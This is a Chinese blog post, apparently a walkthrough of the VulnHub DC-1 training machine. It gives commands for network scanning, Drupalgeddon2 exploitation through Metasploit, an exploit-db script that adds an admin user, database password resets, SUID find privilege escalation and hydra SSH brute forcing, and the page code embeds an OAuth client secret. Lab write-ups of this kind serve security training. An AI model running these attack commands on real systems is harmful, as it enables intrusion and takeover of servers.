<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="Vulhub靶机：DC-1, 1cePeak">
    <meta name="description" content="一头CTF签到爱好者">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Vulhub靶机：DC-1 | 1cePeak</title>
    <link rel="icon" type="image/png" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/panda.png">

    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/css/my.css">

    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/jquery/jquery.min.js"></script>

<link rel="alternate" href="/atom.xml" title="1cePeak" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">1cePeak</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">1cePeak</div>
        <div class="logo-desc">
            
            一头CTF签到爱好者
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    
<script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/images/Drupal.png')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Vulhub靶机：DC-1</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/靶场/">
                                <span class="chip bg-color">靶场</span>
                            </a>
                        
                            <a href="/tags/渗透测试/">
                                <span class="chip bg-color">渗透测试</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-01-06
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>考完研没什么事，终于可以安心搞技术了。打算刷一波Vulhub的靶场，文中如有欠妥的地方还希望各位师傅指正。</p>
<h1 id="Vulhub-DC-1"><a href="#Vulhub-DC-1" class="headerlink" title="Vulhub DC-1"></a>Vulhub DC-1</h1><p>靶机DC-1下载地址：<a href="https://download.vulnhub.com/dc/DC-1.zip" target="_blank" rel="noopener">https://download.vulnhub.com/dc/DC-1.zip</a></p>
<p>靶机描述：靶机DC-1共有5个flag，并且需要root权限才可以找到并查看flag。</p>
<p>靶机IP：192.168.1.146<br>Kali IP：192.168.1.147</p>
<p>靶机与kali以NAT模式连接网络</p>
<p>运行部署好的虚拟机，开机提示需要账号密码，但是没有提供密码，需要自己去渗透提权</p>
<h2 id="一、信息收集"><a href="#一、信息收集" class="headerlink" title="一、信息收集"></a>一、信息收集</h2><p>由于不知道靶机的IP，这就需要探测同一区域中存活的主机</p>
<h3 id="1-探测目标"><a href="#1-探测目标" class="headerlink" title="1.探测目标"></a>1.探测目标</h3><h4 id="方法一-arp-scan"><a href="#方法一-arp-scan" class="headerlink" title="方法一 arp-scan"></a>方法一 arp-scan</h4><p><a href="https://blog.csdn.net/weixin_43221560/article/details/90550294" target="_blank" rel="noopener">arp-scan使用方法</a></p>
<blockquote>
<p>sudo arp-scan -l<br>-l 使用网络接口</p>
</blockquote>
<p>可以看到，同一区域段的靶机ip 192.168.1.146<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/ScanAlivePC.png" alt></p>
<h4 id="方法二-netdiscover"><a href="#方法二-netdiscover" class="headerlink" title="方法二 netdiscover"></a>方法二 netdiscover</h4><blockquote>
<p>netdiscover -r 192.168.1.0/24</p>
</blockquote>
<p>扫描ip段，得到靶机ip 192.168.1.146</p>
<h4 id="方法三-nmap"><a href="#方法三-nmap" class="headerlink" title="方法三 nmap"></a>方法三 nmap</h4><blockquote>
<p>nmap 192.168.1.0/24</p>
</blockquote>
<h3 id="2-查看目标开放端口"><a href="#2-查看目标开放端口" class="headerlink" title="2.查看目标开放端口"></a>2.查看目标开放端口</h3><blockquote>
<p>nmap -sV -p- 192.168.1.146<br>-sV 用来扫描目标主机和端口上运行的软件的版本<br>-p- 扫描0-65535全部端口</p>
</blockquote>
<p>在这里我直接使用nmap -A 192.168.1.146<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/Nmap.png" alt><br>由上图可以看到，该目标开放了ssh服务的22端口、http的80、apache 111的rpcbind等。<br>可以直接访问80端口，查看站点信息。<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/Wappalyzer.png" alt></p>
<blockquote>
<p>Server：Apache/2.2.22 (Debian)<br>Vary：Accept-Encoding<br>X-Generator ：Drupal 7 (<a href="http://drupal.org" target="_blank" rel="noopener">http://drupal.org</a>)<br>X-Powered-By ：PHP/5.4.45-0+deb7u14</p>
</blockquote>
<h2 id="二、漏洞利用"><a href="#二、漏洞利用" class="headerlink" title="二、漏洞利用"></a>二、漏洞利用</h2><h3 id="1-漏洞查找"><a href="#1-漏洞查找" class="headerlink" title="1.漏洞查找"></a>1.漏洞查找</h3><p>掏出神器msf，使用Metasploit搜索针对Drupal的模块。<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/msf.png" alt></p>
<h3 id="2-漏洞利用"><a href="#2-漏洞利用" class="headerlink" title="2.漏洞利用"></a>2.漏洞利用</h3><p>选择合适的版本，使用第四个exploit/unix/webapp/drupal_drupalgeddon2模块打，配置这个模块即可。</p>
<blockquote>
<p>Use exploit/unix/webapp/drupal_drupalgeddon2<br>Show options //查看需要配置项<br>set rhosts 192.168.1.146<br>设置远程主机的IP为靶机的IP地址192.168.1.146</p>
</blockquote>
<h3 id="3-Getshell"><a href="#3-Getshell" class="headerlink" title="3.Getshell"></a>3.Getshell</h3><p><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/exploit.png" alt><br>成功弹回shell，直接使用ls查看目录，拿到flag1.txt<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/flag1.png" alt></p>
<blockquote>
<p>flag1<br>每一个好的CMS都需要一个配置文件，你也一样。</p>
</blockquote>
<p>搜索到Drupal的默认配置文件为 /var/www/sites/default/settings.php<br>直接cat配置文件，可以看到flag2及数据库的账号密码。<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/flag2.png" alt></p>
<blockquote>
<p>flag2<br>蛮力和字典攻击不行，唯一方法是获得访问权限(你将需要访问的)。你能用这些凭证做什么?</p>
</blockquote>
<p>如果我们继续使用这个普通的shell登录数据库，可以发现回显不完全，这时候就需要弹一个交互式的shell，方便我们下一步的操作。</p>
<blockquote>
<p>python -c ‘import pty; pty.spawn(“/bin/bash”)’</p>
</blockquote>
<p><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/pythonShell.png" alt><br>紧接着使用flag2得到的数据库账号密码登录数据库</p>
<blockquote>
<p>mysql -udbuser -p<br>Enter password:R0ck3t</p>
</blockquote>
<p>查看数据库，在drupaldb库users表中发现admin用户<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/showData.png" alt><br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/users.png" alt><br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/usersPass.png" alt><br>可以看到admin用户的密码被加密了，但是我们可以想办法修改密码或新增一个admin权限的用户，从而达到登录站点后台的目的。</p>
<h4 id="方法一-利用自带加密脚本更新密码"><a href="#方法一-利用自带加密脚本更新密码" class="headerlink" title="方法一 利用自带加密脚本更新密码"></a>方法一 利用自带加密脚本更新密码</h4><p>Drupal 7采用了新型的Hash加密方法来确保密码安全。“加了盐（Salt）”的MD5码。<br>在Drupal 7的安装目录中的scripts目录下，是Drupal 7开发者提供的PHP脚本，其中包含了MD5加密算法脚本：password-hash.sh，可以利用脚本直接生成。<br>当然也可以利用网络搜索该cms框架忘记密码的解决办法，官方有提供现成的明文和密文。</p>
<blockquote>
<p>./scripts/password-hash.sh 123456<br>password: 123456<br>hash: $S$DbpIRKV5QXrJK4Gbhb.LDFoTjqoYNKAOB.DY3V1BL.JMbMkZANhY</p>
</blockquote>
<p>更新admin密码为123456</p>
<blockquote>
<p>update  drupaldb.users  set pass=”$S$DbpIRKV5QXrJK4Gbhb.LDFoTjqoYNKAOB.DY3V1BL.JMbMkZANhY” where uid=1;</p>
</blockquote>
<h4 id="方法二-利用漏洞添加新用户"><a href="#方法二-利用漏洞添加新用户" class="headerlink" title="方法二 利用漏洞添加新用户"></a>方法二 利用漏洞添加新用户</h4><p>拿到users表信息，发现破解不了密码，我们可以尝试去exploitdb中看看有没有攻击admin的脚本。<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/sploitDrupal.png" alt><br>可以看到在exploitdb中有一个针对Drupal 7版本的攻击脚本，可以增加一个admin权限的用户。</p>
<blockquote>
<p>python /usr/share/exploitdb/exploits/php/webapps/34992.py -t <a href="http://192.168.1.146" target="_blank" rel="noopener">http://192.168.1.146</a> -u test -p test</p>
</blockquote>
<p><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/exp1.png" alt><br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/exp2.png" alt><br>接下来使用添加成功的test/test用户登陆后台，在Content模块中发现flag3。<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/content.png" alt><br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/flag3.png" alt></p>
<blockquote>
<p>flag3<br>Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.</p>
</blockquote>
<p>由于flag3提示词有perms、find、-exec、shadow共四个特殊提示词，所以这里应该要查看shadow文件，并使用find命令提权。</p>
<blockquote>
<p>/etc/passwd 是一个纯文本文件。它存储用户帐户信息。它包含系统帐户的列表，为每个帐户提供一些有用的信息，如用户 ID、组 ID、主目录、shell等详情。<br>而etc/shadow是/etc/passwd的影子文件，存有密码信息。</p>
</blockquote>
<p>根据之前的提示，cat /etc/passwd可以发现flag4用户<br><img src alt><br>进入flag4用户的目录下，发现flag4.txt文件，并给予提示flag in root(在这里我感觉权限没有做好，应该是提权之后才可以访问flag4的目录，这样比较合理)<br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/passwd.png" alt><br><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/flag4.png" alt></p>
<blockquote>
<p>flag4<br>Can you use this same method to find or access the flag in root?<br>Probably. But perhaps it’s not that easy.  Or maybe it is?</p>
</blockquote>
<p>flag4提示flag在root目录下，在/root下发现thefinalflag.txt，但是没有读取的权限</p>
<p>根据flag3的提示，我们考虑find命令作为突破口。</p>
<blockquote>
<p>SUID提权的思路： 以普通用户身份运行root用户所拥有的SUID的文件，那么普通用户运行该文件的时候就得获得root用户的身份了。</p>
</blockquote>
<p>使用以下命令可以发现系统上运行的所有SUID可执行文件。</p>
<blockquote>
<p>find / -user root -perm -4000 -print 2&gt;/dev/null<br>find / -perm -u=s -type f 2&gt;/dev/null<br>find / -user root -perm -4000 -exec ls -ldb {} ;</p>
</blockquote>
<p>我们在之前拿到的shell中使用find命令查找具有root权限的SUID的文件。</p>
<blockquote>
<p>find / -user root -perm -4000 -print 2&gt;/dev/null</p>
</blockquote>
<p><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/suid.png" alt><br>这里使用find命令，因为它可以使用root权限，根据flag4的提示，flag in root，执行命令：find /root 可以看到有一个thefinalflag.txt，为了获得文件内容，可以利用exec后面的命令直接抓取该文件。</p>
<blockquote>
<p>find /root/thefinalflag.txt -exec cat {} ; </p>
</blockquote>
<p><img src="//1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/flag5.png" alt><br>上图可以看到已经利用成功，拿到flag。</p>
<blockquote>
<p>flag5<br>Well done!!!!<br>Hopefully you’ve enjoyed this and learned some new skills.<br>You can let me know what you thought of this little journey<br>by contacting me via Twitter - @DCAU7</p>
</blockquote>
<h2 id="三、总结"><a href="#三、总结" class="headerlink" title="三、总结"></a>三、总结</h2><h3 id="1-局域网存活主机发现"><a href="#1-局域网存活主机发现" class="headerlink" title="1.局域网存活主机发现"></a>1.局域网存活主机发现</h3><p>sudo arp-scan -l <a href="https://blog.csdn.net/weixin_43221560/article/details/90550294" target="_blank" rel="noopener">arp-scan使用方法</a></p>
<p>sudo netdiscover -i eth0 <a href="https://manpages.debian.org/unstable/netdiscover/netdiscover.8.en.html" target="_blank" rel="noopener">netdiscover使用方法</a></p>
<p>nmap 192.168.1.0/24 <a href="https://www.cnblogs.com/h4ck0ne/p/5154683.html" target="_blank" rel="noopener">nmap使用方法</a></p>
<h3 id="2-漏洞查找与利用"><a href="#2-漏洞查找与利用" class="headerlink" title="2.漏洞查找与利用"></a>2.漏洞查找与利用</h3><p>神器MSF的使用<a href="http://sh1yan.top/2019/07/28/MSF-Command-Notes/" target="_blank" rel="noopener">MSF使用方法</a></p>
<h3 id="3-suid提权"><a href="#3-suid提权" class="headerlink" title="3.suid提权"></a>3.suid提权</h3><p><a href="https://blog.csdn.net/qq_36119192/article/details/84872644" target="_blank" rel="noopener">suid提权1</a><br><a href="https://blog.csdn.net/qq_40510246/article/details/95939784?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase" target="_blank" rel="noopener">suid提权2</a><br><a href="https://www.cnblogs.com/huchong/p/9961625.html" target="_blank" rel="noopener">find命令exec</a></p>
<h3 id="4-交互shell"><a href="#4-交互shell" class="headerlink" title="4.交互shell"></a>4.交互shell</h3><p><a href="https://www.freebuf.com/news/142195.html" target="_blank" rel="noopener">交互shell使用方法</a></p>
<h3 id="5-hydra爆破"><a href="#5-hydra爆破" class="headerlink" title="5.hydra爆破"></a>5.hydra爆破</h3><p>sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.1.146<br><a href="http://www.ha97.com/5186.html" target="_blank" rel="noopener">Hydra爆破使用方法</a></p>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">1cePeak</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/">http://1cepeak.cn/2021/01/06/vulhub-ba-ji-dc-1/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">1cePeak</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/靶场/">
                                    <span class="chip bg-color">靶场</span>
                                </a>
                            
                                <a href="/tags/渗透测试/">
                                    <span class="chip bg-color">渗透测试</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: '3c50a5a7a4f2d28e8bcb',
        clientSecret: '83fa3c55d523ad58f3d65dc48605156d0fd2f79a',
        repo: '1cep3ak.blog',
        owner: '1ceP3ak',
        admin: ["1ceP3ak"],
        id: '2021-01-06T16-00-03',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2021/01/06/vulhub-ba-ji-dc-1/">
                    <div class="card-image">
                        
                        <img src="/images/Drupal.png" class="responsive-img" alt="Vulhub靶机：DC-1">
                        
                        <span class="card-title">Vulhub靶机：DC-1</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            考完研没什么事，终于可以安心搞技术了。打算刷一波Vulhub的靶场，文中如有欠妥的地方还希望各位师傅指正。
Vulhub DC-1靶机DC-1下载地址：https://download.vulnhub.com/dc/DC-1.zip
靶机描
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-01-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            1cePeak
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/靶场/">
                        <span class="chip bg-color">靶场</span>
                    </a>
                    
                    <a href="/tags/渗透测试/">
                        <span class="chip bg-color">渗透测试</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/07/08/2020sctf/">
                    <div class="card-image">
                        
                        <img src="/images/SCTF.png" class="responsive-img" alt="2020SCTF">
                        
                        <span class="card-title">2020SCTF</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            XCTF联赛分站赛-SCTF题解每次比赛都是本考研🐕为数不多的放松时间，真的开心高考加油~由于Nepnep很多师傅去实习了，所以本次参赛的师傅比较少~
Miscsign-in铁签到了，tg入群即可拿flag
Dou dizhu斗地主，永远
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-07-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            1cePeak
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('50')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 1cePeak<br />'
            + '文章作者: 1cePeak<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://cdn.jsdelivr.net/gh/1ceP3ak/1ceP3ak.github.io/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
